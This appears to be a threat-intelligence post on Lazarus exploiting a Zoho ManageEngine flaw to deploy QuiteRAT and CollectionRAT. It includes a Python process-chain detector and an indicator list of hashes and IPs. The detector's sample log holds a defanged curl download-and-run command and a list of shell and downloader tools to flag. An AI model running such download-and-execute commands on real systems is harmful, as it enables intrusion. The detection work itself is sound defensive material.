Lazarus Exploits a Zoho ManageEngine Vulnerability to Distribute QuiteRAT and CollectionRAT

2023-09-22 Hawkeye

https://www.hawk-eye.io/2023/09/lazarus-exploits-a-zoho-manageengine-vulnerability-to-distribute-quiterat-and-collectionrat/


Lazarus exploited CVE-2022-47966, a pre-authentication remote code execution flaw in Zoho ManageEngine products, to compromise exposed ServiceDesk Plus instances and deploy QuiteRAT. Reported victims include UK internet service providers as well as internet backbone suppliers and healthcare organizations in the US and UK.

QuiteRAT is described as a smaller successor to MagicRAT. It retains the same remote access capabilities (system information collection, process execution, file management, reverse shells, payload fetching, and self-deletion) but carries no built-in persistence mechanism, relying instead on the C2 to supply one.

The infection chain begins with exploitation of the exposed ManageEngine server. The product's Java runtime then downloads and runs the QuiteRAT binary, which beacons basic system data to the C2 infrastructure and waits for either command codes or Windows commands, the latter executed through child cmd.exe processes.

Reused Lazarus infrastructure also led researchers to CollectionRAT, a Windows RAT built on the MFC framework that fingerprints victims and supports reverse shells, file read/write, process spawning, execution of additional payloads, and self-deletion. The report includes hashes, IPs, and URLs tied to the activity and notes supporting tradecraft such as DeimosC2, Plink, and Mimikatz.
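The process chain described above (ManageEngine's Java runtime launching a downloader or shell, a dropped binary running from a user-writable directory, and that binary executing commands through child cmd.exe processes) is a concrete thing to hunt for in endpoint telemetry. The following is an added example, not code from Hawkeye or from the original research: a small detector that walks Sysmon-style process-creation records and flags each stage. The install path markers, writable-directory list, field names and all sample events are assumptions constructed for illustration; the "hxxp://example.invalid" URL is a defanged placeholder, not an indicator from the report.

```python
"""Process-chain detection for the QuiteRAT delivery pattern (added example).

Assumes Sysmon-style process-creation records (ProcessId, ParentProcessId,
Image, ParentImage, CommandLine) exported as JSON lines. Paths, file names
and the sample log below are constructed, not taken from an incident.
"""
import json
import ntpath

# Assumption: the product's bundled JRE lives under an install path
# containing one of these substrings.
MANAGEENGINE_PATH_MARKERS = ("\\manageengine\\", "\\servicedesk\\")
SHELLS = {"cmd.exe", "powershell.exe"}
DOWNLOADERS = {"curl.exe", "certutil.exe", "bitsadmin.exe"}
# Assumption: directories a web-facing service should never launch code from.
WRITABLE_DIRS = ("c:\\users\\public\\", "c:\\windows\\temp\\", "\\appdata\\local\\temp\\")

RULE_SHELL = "shell-or-downloader-under-manageengine-java"
RULE_PAYLOAD = "binary-from-writable-dir-under-manageengine-java"

# Constructed sample log: one exploitation chain plus two benign events
# (an interactive cmd.exe and a cmd.exe under an unrelated Java install).
SAMPLE_LOG = r"""
{"ProcessId":1204,"ParentProcessId":900,"ParentImage":"C:\\ManageEngine\\ServiceDesk\\bin\\wrapper.exe","Image":"C:\\ManageEngine\\ServiceDesk\\jre\\bin\\java.exe","CommandLine":"java.exe -Xmx1g"}
{"ProcessId":4120,"ParentProcessId":1204,"ParentImage":"C:\\ManageEngine\\ServiceDesk\\jre\\bin\\java.exe","Image":"C:\\Windows\\System32\\cmd.exe","CommandLine":"cmd.exe /c curl hxxp://example.invalid/update.exe -o C:\\Users\\Public\\update.exe"}
{"ProcessId":4133,"ParentProcessId":4120,"ParentImage":"C:\\Windows\\System32\\cmd.exe","Image":"C:\\Windows\\System32\\curl.exe","CommandLine":"curl hxxp://example.invalid/update.exe -o C:\\Users\\Public\\update.exe"}
{"ProcessId":4150,"ParentProcessId":1204,"ParentImage":"C:\\ManageEngine\\ServiceDesk\\jre\\bin\\java.exe","Image":"C:\\Users\\Public\\update.exe","CommandLine":"C:\\Users\\Public\\update.exe"}
{"ProcessId":4170,"ParentProcessId":4150,"ParentImage":"C:\\Users\\Public\\update.exe","Image":"C:\\Windows\\System32\\cmd.exe","CommandLine":"cmd.exe /c systeminfo"}
{"ProcessId":5001,"ParentProcessId":3000,"ParentImage":"C:\\Windows\\explorer.exe","Image":"C:\\Windows\\System32\\cmd.exe","CommandLine":"cmd.exe"}
{"ProcessId":5002,"ParentProcessId":3100,"ParentImage":"C:\\Program Files\\Java\\jre\\bin\\java.exe","Image":"C:\\Windows\\System32\\cmd.exe","CommandLine":"cmd.exe /c dir"}
"""


def parse_events(text):
    """Parse JSON-lines process-creation records, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def _name(path):
    return ntpath.basename(path).lower()


def is_manageengine_java(image):
    """True for java.exe living under a ManageEngine install path."""
    low = image.lower()
    return _name(image) == "java.exe" and any(m in low for m in MANAGEENGINE_PATH_MARKERS)


def in_writable_dir(image):
    return any(d in image.lower() for d in WRITABLE_DIRS)


def descends_from_manageengine_java(event, by_pid):
    """Walk the parent chain. ParentImage is checked at every hop so the root
    java.exe is recognised even when its own creation event predates logging."""
    seen = set()
    cur = event
    while cur is not None and cur["ProcessId"] not in seen:
        seen.add(cur["ProcessId"])
        if is_manageengine_java(cur["ParentImage"]):
            return True
        cur = by_pid.get(cur["ParentProcessId"])
    return False


def analyze(events):
    """Return (ProcessId, rule) findings for every process that descends from
    ManageEngine's java.exe and is either a shell/downloader or a binary
    running from a user-writable directory."""
    by_pid = {e["ProcessId"]: e for e in events}
    findings = []
    for e in events:
        if not descends_from_manageengine_java(e, by_pid):
            continue
        name = _name(e["Image"])
        if name in SHELLS or name in DOWNLOADERS:
            findings.append((e["ProcessId"], RULE_SHELL))
        elif in_writable_dir(e["Image"]):
            findings.append((e["ProcessId"], RULE_PAYLOAD))
    return findings


def run_sample():
    return analyze(parse_events(SAMPLE_LOG))


if __name__ == "__main__":
    for pid, rule in run_sample():
        print(pid, rule)
```

On the constructed log this flags the cmd.exe and curl.exe spawned during exploitation, the dropped update.exe in C:\Users\Public, and the cmd.exe that update.exe later spawns to run systeminfo, while leaving the explorer.exe-launched shell and the shell under an unrelated Java install alone. Walking the chain by ParentImage rather than by process ID alone matters in practice because a long-running service process such as java.exe typically started before telemetry collection began.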

Indicators of Compromise

Type   Value                              First Seen   Last Seen
HASH   db6a9934570fa98a93a979e7e0e218e…   2023-08-24   2024-12-27
HASH   ed8ec7a8dd089019cfd29143f008fa0…   2023-08-24   2024-07-25
HASH   05e9fe8e9e693cb073ba82096c29114…   2023-08-24   2024-07-25
HASH   773760fd71d52457ba53a314f15dddb…   2023-08-24   2024-07-25
HASH   e3027062e602c5d1812c039739e2f93…   2023-08-24   2024-07-25
IPv4   108.61.186.55                      2023-08-24   2023-09-22
IPv4   146.4.21.94                        2022-09-08   2023-09-22
IPv4   109.248.150.13                     2022-09-08   2023-09-22
